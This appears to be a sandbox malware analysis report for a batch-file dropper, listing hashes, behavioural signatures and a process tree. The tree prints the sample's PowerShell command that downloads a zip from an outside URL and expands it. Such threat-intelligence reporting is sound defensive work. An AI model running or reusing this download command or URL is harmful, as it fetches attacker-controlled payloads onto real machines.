8992e6efcf8d972b9cddf644aea8c5ea29cb571c729029727eb08aa72c793c1c

Analysis

max time kernel
1591s
max time network
1598s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
04-07-2023 14:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tesy10.bat
Size

700B
MD5

185a2d7bf8c479e47ed8e1ef2cffe6a3
SHA1

810436c92e9eb0c3ef0f6867e938b314f85f43c0
SHA256

e5aaa6de5373b002a54ae2cce47c384f11a80e66b03531b98e8eff1a8dd79581
SHA512

9f1fad5e2a66d6e3d8645ce6c4614fe65ccd169dfa7f78fa3ada228bd543fa7c3dadc384d839d063b66887207897226c57dc62bfb8458ba65614f153791c44bd

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	868	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
868	powershell.exe
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 868	2352	cmd.exe	30
PID 2352 wrote to memory of 868	2352	cmd.exe	30
PID 2352 wrote to memory of 868	2352	cmd.exe	30
PID 2352 wrote to memory of 928	2352	cmd.exe	31
PID 2352 wrote to memory of 928	2352	cmd.exe	31
PID 2352 wrote to memory of 928	2352	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tesy10.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip', 'test.zip')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:928

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\21NCRT2ZD6EAK8R61QAE.temp

Filesize
7KB

MD5
d5d153faf5188f91f7721e6b6d689f47

SHA1
32d64f25f57f1a66e68ca4876ed183bd4806fb0b

SHA256
e5af06ba44ccc6cd03daf202f29b5c2333ecee0b0576e258e47621271652438b

SHA512
ba8e5a009d57719fc521935572b77553244b48fa2f4d83cf5944136508d5d465c9444049ec1582c2e55a84ea1a2f9aa2c15d975d9cce052d6a8bf8a5df1162a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d5d153faf5188f91f7721e6b6d689f47

SHA1
32d64f25f57f1a66e68ca4876ed183bd4806fb0b

SHA256
e5af06ba44ccc6cd03daf202f29b5c2333ecee0b0576e258e47621271652438b

SHA512
ba8e5a009d57719fc521935572b77553244b48fa2f4d83cf5944136508d5d465c9444049ec1582c2e55a84ea1a2f9aa2c15d975d9cce052d6a8bf8a5df1162a9

Download Submit
memory/868-58-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/868-59-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/868-60-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/868-61-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/868-62-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/928-69-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/928-70-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/928-71-0x0000000002574000-0x0000000002577000-memory.dmp

Filesize
12KB

Download
memory/928-72-0x000000000257B000-0x00000000025B2000-memory.dmp

Filesize
220KB

Download